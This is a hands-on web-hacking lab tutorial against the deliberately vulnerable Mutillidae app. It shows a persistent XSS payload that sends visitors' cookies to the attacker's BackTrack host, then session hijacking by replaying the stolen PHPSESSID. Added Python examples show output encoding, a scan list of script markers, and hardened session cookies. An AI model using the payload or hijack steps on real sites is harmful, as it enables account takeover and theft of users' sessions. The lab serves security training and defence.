OWASP Top 10 Web Hacking Final Lab 15 - Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2
{ Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2 }
Login to Win-XP or Win7 (Victim Machine)
- Edit Virtual Machine Settings
- Instructions:
- Click on Damn Vulnerable WXP-SP2
- Edit Virtual Machine Settings
- Note(FYI):
- This third Virtual Machine does not have to be Windows XP. It just needs to be another Virtual Machine to demonstrate how the cookie will be sent covertly, without the victim knowing.
- Set Network Adapter
- Instructions:
- Click on Network Adapter
- Click on the radio button "Bridged: Connected directly to the physical network".
- Start Up Damn Vulnerable WXP-SP2.
- Instructions:
- Start Up your VMware Player
- Play virtual machine
- Logging into Damn Vulnerable WXP-SP2.
- Instructions:
- Username: administrator
- Password: <Provide the Password>
- Open a Command Prompt
- Instructions:
- Start --> All Programs --> Accessories --> Command Prompt
- Obtain the IP Address
- Instructions:
- In the Command Prompt type "ipconfig"
- Note(FYI):
- In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
- This is the IP Address of the Victim Machine.
- Record your IP Address.
Section 8. Start Apache Webserver
- Start Apache2 (On BackTrack5R1)
- Instructions:
- service apache2 start
- service apache2 status
- ps -eaf | grep apache2 | grep -v grep
- Note(FYI):
- Start up the apache2 webserver.
- Display the status of the apache2 webserver.
- See the processes of the apache2 webserver.
Section 9. Verify Cookie Script Exists
- Verify Cookie Script Exists (On BackTrack5R1)
- Instructions:
- ls -l /usr/lib/cgi-bin/logit.pl
- cat /dev/null > /var/www/logdir/log.txt
- ls -l /var/www/logdir/log.txt
- Note(FYI):
- List the logit.pl script. If this script is not present, then complete the prerequisite lab.
- Clear the log.txt Harvest0r file.
- Notice the log.txt is now a Zero Byte File.
Section 10. Open Mutillidae
- Open Firefox (On BackTrack5R1)
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If the Firefox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Reset Database
- Instructions:
- Click the Reset DB Link
- Notes (FYI):
- This link will remove the XSS Injection from the database.
- Proceed with Database Reset
- Instructions:
- Click the OK Button
Section 11. Persistent Covert Cross Site Script (XSS)
- Add to your blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
- Inspect Element
- Instructions:
- Right Click in the Comment Box
- Click Inspect Element
- Note(FYI):
- This is not a necessary step for the injection. The goal is to allow the injection attempt to remain on the same line instead of being word-wrapped.
- Change Text Area Column Length
- Instructions:
- Change 65 to 95
- Click Close Button (See Picture)
- Covert Cookie Harvest0r Cross Site Script (XSS) Injection
- Note(FYI):
- Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
- This JavaScript tells the web browser to send the cookies back to the CGI Cookie Script on the BackTrack Machine.
- Instructions:
- Place the below text in the comment box.
- <script> new Image().src="http://192.168.1.112/cgi-bin/logit.pl?"+document.cookie; </script>
- Click the Save Blog Entry
- View Cookie Harvest0r Cross Site Script (XSS) Results
- Note(FYI):
- Notice nothing is displayed under the comment cell.
- Or are your eyes deceiving you?
- View the Harvest0r Log
- Instructions:
- cat /var/www/logdir/log.txt
- Notes (FYI):
- Although the Blog displayed nothing back to us, the cookie was covertly recorded in our Harvest0r log.
- How do you like them apples?
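The reason the blog shows an empty comment cell is that the stored comment is written into the page unencoded, so the browser treats the `<script>` block as code rather than text. The following added example (not part of the original lab or of Mutillidae's own code) contrasts that vulnerable rendering with HTML-entity encoding of the comment at output time, using the same payload the lab injects, and adds a small scan a defender could run over stored blog entries to flag script tags or `document.cookie` references. The `<td>` wrapper and the entry list are constructed for illustration.

```python
import html

# Constructed sample: the exact payload the lab places in the comment box.
COOKIE_HARVEST_PAYLOAD = (
    '<script> new Image().src="http://192.168.1.112/cgi-bin/logit.pl?"'
    '+document.cookie; </script>'
)


def render_comment_unsafe(comment):
    """Mimics the vulnerable behaviour: the stored comment is concatenated
    straight into the HTML table cell, so any <script> in it executes and
    the cell appears empty to the viewer."""
    return "<td>" + comment + "</td>"


def render_comment_safe(comment):
    """Entity-encode the comment before placing it in the page.
    '<', '>', '&', '"' and "'" become entities, so the browser displays
    the payload as literal text instead of running it."""
    return "<td>" + html.escape(comment, quote=True) + "</td>"


def contains_active_script(rendered_html):
    """Crude check used only to show the difference between the two
    renderings: does the output still contain a real <script start tag?"""
    return "<script" in rendered_html.lower()


# Signatures a defender might look for when reviewing stored comments.
SUSPICIOUS_MARKERS = ("<script", "document.cookie", "onerror=", "javascript:")


def flag_suspicious_entries(entries):
    """Return the (index, entry) pairs whose raw stored text carries one of
    the markers above. 'entries' is a list of comment strings as they sit
    in the database (constructed input in the test)."""
    flagged = []
    for idx, text in enumerate(entries):
        lowered = text.lower()
        if any(marker in lowered for marker in SUSPICIOUS_MARKERS):
            flagged.append((idx, text))
    return flagged


if __name__ == "__main__":
    print(render_comment_unsafe(COOKIE_HARVEST_PAYLOAD))
    print(render_comment_safe(COOKIE_HARVEST_PAYLOAD))
    print(flag_suspicious_entries(["Nice blog!", COOKIE_HARVEST_PAYLOAD]))
```

With `render_comment_safe` in place the viewer sees the `<script>` text in the cell, and no request to `logit.pl` is ever made; the scan is a review aid, not a substitute for encoding every untrusted value at output.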
Section 12. Login to Mutillidae
- Start up Internet Explo[d]er (On Damn Vulnerable WXP-SP2)
- Instructions:
- Start --> All Programs --> Internet Explorer
- Open the Mutillidae Application
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Click Login/Register
- Login
- Instructions:
- Name: samurai
- Password: samurai
- Click the Login Button
- Notes(FYI):
- We are logging on to Mutillidae to simulate a user logging on to a real application and being granted a Session ID.
- View someone's blog
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Persistent (Second Order) --> View someone's blog
- Show All Blog Entries
- Instructions:
- Select Show All from the drop-down menu
- View Blog Entries
- Note(FYI):
- Notice nothing is displayed under the comment cell.
- Is this Deja Vu?
Section 13. View Harvest0r Log
- View the Harvest0r Log (On BackTrack5R1)
- Instructions:
- cat /var/www/logdir/log.txt
- Notes (FYI):
- Notice the cookie now shows the username samurai.
- Notice the cookie now shows the PHP Session ID, which is pretty much equivalent to a password.
Section 14. Simulate Man-In-The-Middle Attack
- On BackTrack, Open Firefox (On BackTrack5R1)
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If the Firefox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
- Start Cookies Manager+
- Instructions:
- Tools --> Cookies Manager+
- Notes (FYI):
- Click here to install Cookies Manager+ if you have not already done so.
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add PHPSESSID Cookie Entry
- Note(FYI):
- Replace jri8sj5cnl6ironsqtnbpo9e21 with your PHPSESSID found in crack_cookies.txt (See Below Picture).
- Replace 192.168.1.111 with Mutillidae's Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: PHPSESSID
- Content: jri8sj5cnl6ironsqtnbpo9e21
- Host: 192.168.1.111
- Path: /
- Click the Save Button.
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add showhints Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: showhints
- Content: 0
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add username Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: username
- Content: samurai
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Add Cookie Entry
- Instructions:
- Click the Add Button
- Add uid Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: uid
- Content: 6
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Click the Close Button
- Implement Man-in-the-Middle Attack
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's Host IP Address obtained from (Section 3, Step 3).
- Notice you will be automagically logged in without a password. For this reason it is extremely important that (1) session information is encrypted in transit and (2) users log out when they finish their session, so a captured session ID stops working.
- Instructions:
- http://192.168.1.111/mutillidae/
- Notice that user samurai logged in without a password.
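Section 13 makes the point that the PHPSESSID is as good as a password, and the note above names the two defences: protect the session identifier and invalidate it on logout. The following added example (my own Python, not Mutillidae's PHP session handling, which is not shown on this page) builds a session cookie with the HttpOnly flag, so `document.cookie` cannot read it and the lab's payload would harvest nothing useful, plus Secure and SameSite; it audits a Set-Cookie header for those flags, and it keeps a hypothetical server-side session store whose logout removes the entry, so a replayed PHPSESSID no longer maps to a user. The `SessionStore` class is an assumption made for the example; the weak header in the test reuses the cookie value shown in the lab.

```python
import secrets
from http.cookies import SimpleCookie


class SessionStore:
    """Hypothetical server-side session table (an assumption for this
    example). The cookie only carries an opaque ID; the username lives here."""

    def __init__(self):
        self._sessions = {}

    def login(self, username):
        # 128-bit random ID: the value the victim's browser would hold.
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"username": username}
        return sid

    def user_for(self, sid):
        # Returns None for unknown or invalidated IDs.
        entry = self._sessions.get(sid)
        return entry["username"] if entry else None

    def logout(self, sid):
        # Removing the entry server-side is what makes a stolen or
        # replayed ID useless after the user logs out.
        self._sessions.pop(sid, None)


def build_session_cookie(sid):
    """Produce the Set-Cookie value for PHPSESSID with the hardening flags:
    HttpOnly (not readable from script, which defeats document.cookie
    harvesting), Secure (sent only over HTTPS) and SameSite=Lax."""
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = sid
    cookie["PHPSESSID"]["path"] = "/"
    cookie["PHPSESSID"]["httponly"] = True
    cookie["PHPSESSID"]["secure"] = True
    cookie["PHPSESSID"]["samesite"] = "Lax"
    return cookie["PHPSESSID"].OutputString()


def audit_set_cookie(header_value):
    """Return the list of required flags missing from a Set-Cookie value.
    Attribute names are compared case-insensitively; the first segment is
    the name=value pair and is skipped."""
    attributes = set()
    for part in header_value.split(";")[1:]:
        name = part.strip().split("=", 1)[0].lower()
        if name:
            attributes.add(name)
    return [flag for flag in ("httponly", "secure") if flag not in attributes]


if __name__ == "__main__":
    store = SessionStore()
    sid = store.login("samurai")
    header = build_session_cookie(sid)
    print(header)
    print("missing flags:", audit_set_cookie(header))
    store.logout(sid)
    print("user after logout:", store.user_for(sid))
```

In PHP the equivalent settings are `session.cookie_httponly` and `session.cookie_secure` in php.ini, and the logout handler must destroy the server-side session rather than only clearing the cookie in the browser.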
- On BackTrack, Start up a terminal window (On BackTrack5R1)
- Instructions:
- Click on the Terminal Window
- Proof of Lab: Record the entire lab process and a text note with your name.